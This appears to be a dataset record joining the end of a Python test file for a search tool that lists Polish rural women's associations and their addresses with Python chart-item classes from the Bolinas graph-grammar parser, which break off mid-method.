'Tomaszów 44 "b"' + '\n' + \
'26-505 Tomaszów' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_indirect_matches_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_indirect_matches=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_duplicate_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_duplicate_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_duplicate_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Results found: 4'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_duplicate_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_duplicates=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_twice(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'33-393 MARCINKOWICE' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 124' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 104' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'Koło Gospodyń Wiejskich "Marcinkowicanki"' + '\n' + \
'Marcinkowice 47' + '\n' + \
'33-273 Marcinkowice' + '\n\n' + \
'Results found: 5'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_twice')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_on_multiple_pages_all_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'00-001 NOWA WIEŚ' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś Niemczańska' + '\n' + \
'Nowa Wieś Niemczańska 36 lok. 2' + '\n' + \
'58-230 Nowa Wieś Niemczańska' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowowianki w Nowej Wsi Legnickiej' + '\n' + \
'Nowa Wieś Legnicka 56' + '\n' + \
'59-241 Nowa Wieś Legnicka' + '\n\n' + \
'Koło Gospodyń Wiejskich POLANKI w Nowej Wsi Grodziskiej' + '\n' + \
'Nowa Wieś Grodziska 54' + '\n' + \
'59-524 Nowa Wieś Grodziska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi "Ale Babki"' + '\n' + \
'Nowa Wieś 63' + '\n' + \
'87-602 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 80' + '\n' + \
'88-324 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 76' + '\n' + \
'21-107 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 20C' + '\n' + \
'22-600 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 27' + '\n' + \
'99-300 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich ,,Futuryści" w Nowej Wsi' + '\n' + \
'Nowa Wieś 84' + '\n' + \
'97-340 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś "Koniczynka"' + '\n' + \
'Nowa Wieś 3' + '\n' + \
'97-330 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Szlachcianki' + '\n' + \
'Nowa Wieś Szlachecka 1b' + '\n' + \
'32-060 Nowa Wieś Szlachecka' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś' + '\n' + \
'Nowa Wieś 42' + '\n' + \
'32-046 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi (gmina Łabowa)' + '\n' + \
'Nowa Wieś 55' + '\n' + \
'33-336 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 25' + '\n' + \
'05-660 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Babeczki z pieprzem i solą' + '\n' + \
'Nowa Wieś 52' + '\n' + \
'26-900 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich "Nowalijki" w Nowej Wsi' + '\n' + \
'ul. Reymonta 32 A' + '\n' + \
'07-416 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Wschodniej' + '\n' + \
'Nowa Wieś Wschodnia 32A' + '\n' + \
'07-411 Nowa Wieś Wschodnia' + '\n\n' + \
'Koło Gospodyń Wiejskich KAROLEWO-NOWA WIEŚ' + '\n' + \
'Nowa Wieś 1' + '\n' + \
'09-505 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich "Stokrotka"' + '\n' + \
'Nowa Wieś 7B' + '\n' + \
'09-440 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Gospochy w Nowej Wsi' + '\n' + \
'ul. Magnolii 7' + '\n' + \
'05-806 Nowa Wieś' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W NOWEJ WSI' + '\n' + \
'ul. Wolności 37' + '\n' + \
'08-300 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś lok. 90' + '\n' + \
'36-100 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 152 A' + '\n' + \
'38-120 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich "Wespół w Zespół" w Nowej Wsi' + '\n' + \
'Nowa Wieś 18F' + '\n' + \
'16-402 Nowa Wieś' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH FIOŁKI W NOWEJ WSI' + '\n' + \
'Nowa Wieś 4' + '\n' + \
'77-320 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Przywidzkiej' + '\n' + \
'ul. Szkolna 2' + '\n' + \
'83-047 Nowa Wieś Przywidzka' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 41' + '\n' + \
'42-110 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś' + '\n' + \
'Nowa Wieś 100' + '\n' + \
'28-362 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 25' + '\n' + \
'27-640 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi „Nowalijki”' + '\n' + \
'Nowa Wieś 9A' + '\n' + \
'11-030 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Niechanowskiej "Storczyk"' + '\n' + \
'Nowa Wieś Niechanowska 14' + '\n' + \
'62-220 Nowa Wieś Niechanowska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Książęcej' + '\n' + \
'Nowa Wieś Książęca 35' + '\n' + \
'63-640 Nowa Wieś Książęca' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W NOWEJ WSI' + '\n' + \
'Nowa Wieś ' + '\n' + \
'63-708 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 19 lok. B7' + '\n' + \
'63-308 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Podgórnej' + '\n' + \
'Nowa Wieś Podgórna 21 lok. 2' + '\n' + \
'62-320 Nowa Wieś Podgórna' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Królewskiej' + '\n' + \
'Nowa Wieś Królewska 22' + '\n' + \
'62-300 Nowa Wieś Królewska' + '\n\n' + \
'Results found: 36'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_on_multiple_pages_all_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_indirect_matches=True, allow_duplicates=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_on_multiple_pages_indirect_matches_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'62-300 NOWA WIEŚ' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Niechanowskiej "Storczyk"' + '\n' + \
'Nowa Wieś Niechanowska 14' + '\n' + \
'62-220 Nowa Wieś Niechanowska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Podgórnej' + '\n' + \
'Nowa Wieś Podgórna 21 lok. 2' + '\n' + \
'62-320 Nowa Wieś Podgórna' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Królewskiej' + '\n' + \
'Nowa Wieś Królewska 22' + '\n' + \
'62-300 Nowa Wieś Królewska' + '\n\n' + \
'Results found: 3'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_on_multiple_pages_indirect_matches_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_with_empty_details(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'89-200 TUR' + '\n\n' + \
'Koło Gospodyń Wiejskich Centrum Kultury Ostrowite' + '\n' + \
'ul. Szkolna 22' + '\n' + \
'89-620 Ostrowite' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_with_empty_details')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_basic_use_cases(create_reports_dirs, remove_reports_dirs):
"""
no_result
single_result
multiple_results
no_result_twice
single_result_indirect_match_skipped
multiple_results_on_multiple_pages_indirect_matches_skipped
single_result_duplicate_skipped
multiple_results_twice
single_result_twice
"""
expected_report = \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'======================================================================' + '\n' + \
'33-322 JASIENNA' + '\n\n' + \
'======================================================================' + '\n' + \
'33-334 BOGUSZA' + '\n\n' + \
'======================================================================' + '\n' + \
'62-300 NOWA WIEŚ' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Niechanowskiej "Storczyk"' + '\n' + \
'Nowa Wieś Niechanowska 14' + '\n' + \
'62-220 Nowa Wieś Niechanowska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Podgórnej' + '\n' + \
'Nowa Wieś Podgórna 21 lok. 2' + '\n' + \
'62-320 Nowa Wieś Podgórna' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Królewskiej' + '\n' + \
'Nowa Wieś Królewska 22' + '\n' + \
'62-300 Nowa Wieś Królewska' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'======================================================================' + '\n' + \
'33-393 MARCINKOWICE' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 124' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 104' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'Koło Gospodyń Wiejskich "Marcinkowicanki"' + '\n' + \
'Marcinkowice 47' + '\n' + \
'33-273 Marcinkowice' + '\n\n' + \
'======================================================================' + '\n' + \
'22-234 SĘKÓW' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH "BUBNOWSKIE BABY"' + '\n' + \
'Sęków 15' + '\n' + \
'22-234 Sęków' + '\n\n' + \
'======================================================================' + '\n' + \
'21-421 ZASTAWIE' + '\n\n' + \
'Koło Gospodyń Wiejskich w Zastawiu' + '\n' + \
'Zastawie 47A' + '\n' + \
'21-421 Zastawie' + '\n\n' + \
'Results found: 11'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='basic_use_cases')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
| 48.251462 | 145 | 0.531653 | 2,759 | 24,753 | 4.499094 | 0.093875 | 0.020624 | 0.036736 | 0.085717 | 0.873359 | 0.838315 | 0.828245 | 0.809555 | 0.795859 | 0.781036 | 0 | 0.038731 | 0.238557 | 24,753 | 512 | 146 | 48.345703 | 0.619801 | 0.009211 | 0 | 0.625 | 0 | 0 | 0.45365 | 0.136536 | 0 | 0 | 0 | 0 | 0.043182 | 1 | 0.047727 | false | 0 | 0.004545 | 0 | 0.052273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb2f35d72860c941a4140869fd28c700aa0e181d | 19,950 | py | Python | parser/vo_item.py | gemoku/bolinas | dbdc2417d8ae82394f3f8e5e0758bad86b9cfd5a | [
"MIT"
] | 13 | 2015-12-05T16:30:48.000Z | 2021-04-15T14:38:24.000Z | parser/vo_item.py | karlmoritz/bolinas | 7a1a78bca0a6ba1cb9d80b13d2a87ce37993507f | [
"MIT"
] | 1 | 2015-10-18T03:50:53.000Z | 2015-10-18T03:58:28.000Z | parser/vo_item.py | karlmoritz/bolinas | 7a1a78bca0a6ba1cb9d80b13d2a87ce37993507f | [
"MIT"
] | 5 | 2015-10-18T03:10:07.000Z | 2018-06-29T17:40:43.000Z | from common.hgraph.hgraph import NonterminalLabel
from common import log
import itertools
# Some general advice for reading this file:
#
# Every rule specifies some fragment of the object (graph, string or both) that
# is being parsed, as well as a visit order on the individual elements of that
# fragment (edges or tokens, respectively). The number of elements already
# visited is called the "size" of this item, and an item with nothing left to
# visit is "closed". The visit order specifies an implicit binarization of the
# rule in question, by allowing the item to consume only one other object (which
# we call the "outside" of the item) at any given time.
#
# In consuming this object, we either "shift" a terminal element or "complete" a
# nonterminal (actually a closed chart item). Each of these steps produces a new
# chart item.
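The size/closed bookkeeping described above can be sketched in isolation. `ToyItem` below is a hypothetical stand-in, not the real `Rule`/`Item` classes: it walks a fragment's elements in visit order, consuming one at a time, and closes once nothing is left.

```python
class ToyItem:
    """Hypothetical stand-in illustrating the size/closed bookkeeping."""
    def __init__(self, elements, size=0):
        self.elements = elements                 # fragment elements, in visit order
        self.size = size                         # number of elements already visited
        self.closed = size == len(elements)      # closed once nothing is left
        self.outside = None if self.closed else elements[size]

    def consume(self):
        """Shift a terminal or complete a nonterminal: yields a larger item."""
        return ToyItem(self.elements, self.size + 1)

item = ToyItem(["the", "NP[1]", "ran"])
while not item.closed:
    item = item.consume()
```

Each `consume` returns a fresh item rather than mutating, mirroring how `shift` and `complete` below build new chart items.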
class Item(object):
pass
class HergItem(Item):
"""
Chart item for a HRG parse.
"""
def __init__(self, rule, size=None, shifted=None, mapping=None, nodeset=None, nodelabels=False):
# by default start empty, with no part of the graph consumed
    if size is None:
      size = 0
    if shifted is None:
      shifted = frozenset()
    if mapping is None:
      mapping = dict()
    if nodeset is None:
      nodeset = frozenset()
self.rule = rule
self.size = size
self.shifted = shifted
self.mapping = mapping
self.nodeset = nodeset
self.rev_mapping = dict((val, key) for key, val in mapping.items())
self.nodelabels = nodelabels
# Store the nonterminal symbol and index of the previous complete
# on this item so we can rebuild the derivation easily
triples = rule.rhs1.triples(nodelabels = nodelabels)
self.outside_symbol = None
if size < len(triples):
# this item is not closed
self.outside_triple = triples[rule.rhs1_visit_order[size]]
self.outside_edge = self.outside_triple[1]
self.closed = False
self.outside_is_nonterminal = isinstance(self.outside_triple[1],
NonterminalLabel)
if self.outside_is_nonterminal:
# strip the index off of the nonterminal label
#self.outside_symbol = str(self.outside_triple[1])
#self.outside_symbol = self.outside_symbol[1:].split('[')[0]
self.outside_symbol = self.outside_triple[1].label
self.outside_nt_index = self.outside_triple[1].index
else:
# this item is closed
self.outside_triple = None
self.outside_edge = None
self.closed = True
self.outside_is_nonterminal = False
self.__cached_hash = None
def __hash__(self):
# memoize the hash function
if not self.__cached_hash:
self.__cached_hash = 2 * hash(self.rule) + 3 * self.size + \
5 * hash(self.shifted)
return self.__cached_hash
def __eq__(self, other):
return isinstance(other, HergItem) and \
other.rule == self.rule and \
other.size == self.size and \
other.shifted == self.shifted and \
other.mapping == self.mapping
def uniq_str(self):
"""
Produces a unique string representation of this item. When representing
charts in other formats (e.g. when writing a tiburon RTG file) we have to
represent this item as a string, which we build from the rule id and list of
nodes.
"""
return 'R%d__%s' % (self.rule.rule_id, self.uniq_cover_str())
def uniq_cover_str(self):
edges = set()
for head, elabel, tail in self.shifted:
if tail:
edges.add('%s:%s' % (head[0], ':'.join([x[0] for x in tail])))
else:
edges.add(head[0])
return ','.join(sorted(list(edges)))
def __repr__(self):
return 'HergItem(%d, %d, %s, %s)' % (self.rule.rule_id, self.size, self.rule.symbol, len(self.shifted))
def __str__(self):
return '[%d, %d/%d, %s, {%s}]' % (self.rule.rule_id,
self.size,
len(self.rule.rhs1.triples()),
self.outside_symbol,
str([x for x in self.shifted]))
def can_shift(self, new_edge):
"""
Determines whether new_edge matches the outside of this item, and can be
shifted.
"""
#print "SHIFT", self, "<---", new_edge
# can't shift into a closed item
if self.closed:
return False
# can't shift an edge that is already inside this item
if new_edge in self.shifted:
return False
olabel = self.outside_triple[1]
nlabel = new_edge[1]
    # make sure new_edge matches the outside label
if olabel != nlabel:
return False
# make sure new_edge preserves a consistent mapping between the nodes of the
# graph and the nodes of the rule
if self.nodelabels:
#print o1
o1, o1_label = self.outside_triple[0]
n1, n1_label = new_edge[0]
if o1_label != n1_label:
return False
else:
o1 = self.outside_triple[0]
n1 = new_edge[0]
if o1 in self.mapping and self.mapping[o1] != n1:
return False
# if this node is not a node of this rule RHS, but of a subgraph it needs to have a mapping.
# otherwise, we can't attach.
if n1 in self.nodeset and n1 not in self.rev_mapping:
return False
if self.nodelabels:
if self.outside_triple[2]:
o2, o2_labels = zip(*self.outside_triple[2])
else: o2, o2_labels = [],[]
if new_edge[2]:
n2, n2_labels = zip(*new_edge[2])
else: n2, n2_labels = [],[]
if o2_labels != n2_labels:
return False
else:
o2 = self.outside_triple[2]
n2 = new_edge[2]
if len(o2) != len(n2):
return False
for i in range(len(o2)):
if o2[i] in self.mapping and self.mapping[o2[i]] != n2[i]:
return False
# Again, need to make sure this node is part of the rule RHS, not of a
# proper subgraph.
if n2[i] in self.nodeset and n2[i] not in self.rev_mapping:
return False
return True
def shift(self, new_edge):
"""
Creates the chart item resulting from a shift of new_edge. Assumes
can_shift returned true.
"""
olabel = self.outside_triple[1]
o1 = self.outside_triple[0][0] if self.nodelabels else self.outside_triple[0]
o2 = tuple(x[0] for x in self.outside_triple[2]) if self.nodelabels else self.outside_triple[2]
nlabel = new_edge[1]
n1 = new_edge[0][0] if self.nodelabels else new_edge[0]
n2 = tuple(x[0] for x in new_edge[2]) if self.nodelabels else new_edge[2]
new_nodeset = self.nodeset | set(n2) | set([n1])
assert len(o2) == len(n2)
new_size = self.size + 1
new_shifted = frozenset(self.shifted | set([new_edge]))
new_mapping = dict(self.mapping)
new_mapping[o1] = n1
for i in range(len(o2)):
new_mapping[o2[i]] = n2[i]
return HergItem(self.rule, new_size, new_shifted, new_mapping, new_nodeset, self.nodelabels)
def can_complete(self, new_item):
"""
Determines whether new_item matches the outside of this item (i.e. if the
nonterminals match and the node mappings agree).
"""
# can't add to a closed item
if self.closed:
#log.debug('fail bc closed')
return False
# can't shift an incomplete item
if not new_item.closed:
#log.debug('fail bc other not closed')
return False
# make sure labels agree
if not self.outside_is_nonterminal:
#log.debug('fail bc outside terminal')
return False
#Make sure items are disjoint
if any(edge in self.shifted for edge in new_item.shifted):
#log.debug('fail bc overlap')
return False
# make sure mappings agree
if self.nodelabels:
o1, o1label = self.outside_triple[0]
if self.outside_triple[2]:
o2, o2labels = zip(*self.outside_triple[2])
else:
o2, o2labels = [],[]
else:
o1 = self.outside_triple[0]
o2 = self.outside_triple[2]
if len(o2) != len(new_item.rule.rhs1.external_nodes):
#log.debug('fail bc hyperedge type mismatch')
return False
nroot = list(new_item.rule.rhs1.roots)[0]
#Check root label
if self.nodelabels and o1label != new_item.rule.rhs1.node_to_concepts[nroot]:
return False
if o1 in self.mapping and self.mapping[o1] != new_item.mapping[nroot]:
# new_item.mapping[new_item.rule.rhs1.roots[0]]:
#log.debug('fail bc mismapping')
return False
real_nroot = new_item.mapping[nroot]
real_ntail = None
for i in range(len(o2)):
otail = o2[i]
ntail = new_item.rule.rhs1.rev_external_nodes[i]
#Check tail label
if self.nodelabels and o2labels[i] != new_item.rule.rhs1.node_to_concepts[ntail]:
return False
if otail in self.mapping and self.mapping[otail] != new_item.mapping[ntail]:
#log.debug('fail bc bad mapping in tail')
return False
for node in new_item.mapping.values():
if node in self.rev_mapping:
onode = self.rev_mapping[node]
if not (onode == o1 or onode in o2):
return False
return True
def complete(self, new_item):
"""
    Creates the chart item resulting from a complete of new_item. Assumes
    can_complete returned true.
"""
olabel = self.outside_triple[1]
o1 = self.outside_triple[0][0] if self.nodelabels else self.outside_triple[0]
o2 = tuple(x[0] for x in self.outside_triple[2]) if self.nodelabels else self.outside_triple[2]
new_size = self.size + 1
new_shifted = frozenset(self.shifted | new_item.shifted)
new_mapping = dict(self.mapping)
new_mapping[o1] = new_item.mapping[list(new_item.rule.rhs1.roots)[0]]
for i in range(len(o2)):
otail = o2[i]
ntail = new_item.rule.rhs1.rev_external_nodes[i]
new_mapping[otail] = new_item.mapping[ntail]
new_nodeset = self.nodeset | new_item.nodeset
new = HergItem(self.rule, new_size, new_shifted, new_mapping, new_nodeset, self.nodelabels)
return new
class CfgItem(Item):
"""
Chart item for a CFG parse.
"""
def __init__(self, rule, size=None, i=None, j=None, nodelabels = False):
# until this item is associated with some span in the sentence, let i and j
# (the left and right boundaries) be -1
    if size is None:
      size = 0
    if i is None:
      i = -1
    if j is None:
      j = -1
self.rule = rule
self.i = i
self.j = j
self.size = size
self.shifted = []
assert len(rule.rhs1) != 0
if size == 0:
assert i == -1
assert j == -1
self.closed = False
self.outside_word = rule.rhs1[rule.rhs1_visit_order[0]]
elif size < len(rule.string):
self.closed = False
self.outside_word = rule.string[rule.rhs1_visit_order[self.size]]
else:
self.closed = True
self.outside_word = None
if self.outside_word and isinstance(self.outside_word, NonterminalLabel):
self.outside_is_nonterminal = True
self.outside_symbol = self.outside_word.label
self.outside_nt_index = self.outside_word.index
else:
self.outside_is_nonterminal = False
self.__cached_hash = None
def __hash__(self):
if not self.__cached_hash:
self.__cached_hash = 2 * hash(self.rule) + 3 * self.i + 5 * self.j
return self.__cached_hash
def __eq__(self, other):
return isinstance(other, CfgItem) and \
other.rule == self.rule and \
other.i == self.i and \
other.j == self.j and \
other.size == self.size
def __repr__(self):
return 'CfgItem(%d, %d, %s, (%d, %d))' % (self.rule.rule_id, self.size, str(self.closed), self.i, self.j)
def __str__(self):
return '[%s, %d/%d, (%d,%d)]' % (self.rule,
self.size,
len(self.rule.rhs1),
self.i,self.j)
def uniq_str(self):
"""
Produces a unique string representation of this item (see note on uniq_str
in HergItem above).
"""
return '%d__%d_%d' % (self.rule.rule_id, self.i, self.j)
def can_shift(self, word, index):
"""
Determines whether word matches the outside of this item (i.e. is adjacent
and has the right symbol) and can be shifted.
"""
if self.closed:
return False
if self.i == -1:
return True
if index == self.i - 1:
return self.outside_word == word
elif index == self.j:
return self.outside_word == word
return False
def shift(self, word, index):
"""
Creates the chart item resulting from a shift of the word at the given
index.
"""
if self.i == -1:
return CfgItem(self.rule, self.size+1, index, index+1)
elif index == self.i - 1:
return CfgItem(self.rule, self.size+1, self.i-1, self.j)
elif index == self.j:
return CfgItem(self.rule, self.size+1, self.i, self.j+1)
assert False
def can_complete(self, new_item):
"""
Determines whether new_item matches the outside of this item.
"""
if self.closed:
return False
if not new_item.closed:
return False
if self.outside_symbol != new_item.rule.symbol:
return False
return self.i == -1 or new_item.i == self.j #or new_item.j == self.i
def complete(self, new_item):
"""
Creates the chart item resulting from a completion with the given item.
"""
if self.i == -1:
return CfgItem(self.rule, self.size+1, new_item.i, new_item.j)
elif new_item.i == self.j:
return CfgItem(self.rule, self.size+1, self.i, new_item.j)
elif new_item.j == self.i:
return CfgItem(self.rule, self.size+1, new_item.i, self.j)
assert False
class SynchronousItem(Item):
"""
Chart item for a synchronous CFG/HRG parse. (Just a wrapper for paired
CfgItem / HergItem.)
"""
def __init__(self, rule, item1class, item2class, item1 = None, item2 = None, nodelabels = False):
self.shifted = ([],[])
self.rule = rule
self.nodelabels = nodelabels
self.item1class = item1class
self.item2class = item2class
if item1:
self.item1 = item1
else:
self.item1 = item1class(rule.project_left(), nodelabels = nodelabels)
if item2:
self.item2 = item2
else:
self.item2 = item2class(rule.project_right(), nodelabels = nodelabels)
if self.item1.closed and self.item2.closed:
self.closed = True
else:
self.closed = False
# Now we potentially have two outsides---one in the graph and the other in
# the string. The visit order will guarantee that if we first consume all
# terminals in any order, the remainder of both string and graph visit
# orders will agree on the sequence in which to consume nonterminals. (See
# the Rule class.) Before consuming all terminals, it might be the case that
# one item has a terminal outside and the other a nonterminal; in that case
# we do not want an outside nonterminal associated with this item.
if item1class is CfgItem:
self.outside1_is_nonterminal = self.item1.outside_is_nonterminal
self.outside_object1 = self.item1.outside_word
else:
self.outside1_is_nonterminal = self.item1.outside_is_nonterminal
self.outside_object1= self.item1.outside_triple[1] if \
self.item1.outside_triple else None
if item2class is CfgItem:
self.outside2_is_nonterminal = self.item2.outside_is_nonterminal
self.outside_object2 = self.item2.outside_word
else:
self.outside2_is_nonterminal = self.item2.outside_is_nonterminal
self.outside_object2 = self.item2.outside_triple[1] if \
self.item2.outside_triple else None
self.outside_is_nonterminal = self.outside1_is_nonterminal and \
self.outside2_is_nonterminal
if self.outside_is_nonterminal:
assert self.outside_object1 == self.outside_object2
self.outside_symbol = self.item1.outside_symbol
self.outside_nt_index = self.item1.outside_nt_index
self.__cached_hash = None
def uniq_str(self):
"""
Produces a unique string representation of this item (see note on uniq_str
in HergItem above).
"""
edges = set()
    if self.item1class is CfgItem:
      item1cover = "%d,%d" % (self.item1.i, self.item1.j)
    elif self.item1class is HergItem:
      item1cover = self.item1.uniq_cover_str()
    if self.item2class is CfgItem:
      item2cover = "%d,%d" % (self.item2.i, self.item2.j)
    elif self.item2class is HergItem:
      item2cover = self.item2.uniq_cover_str()
return '%d__%s__%s' % (self.rule.rule_id, item1cover, item2cover)
def __hash__(self):
if not self.__cached_hash:
self.__cached_hash = 2 * hash(self.item1) + 7 * hash(self.item2)
return self.__cached_hash
def __eq__(self, other):
return isinstance(other, SynchronousItem) and other.item1 == self.item1 \
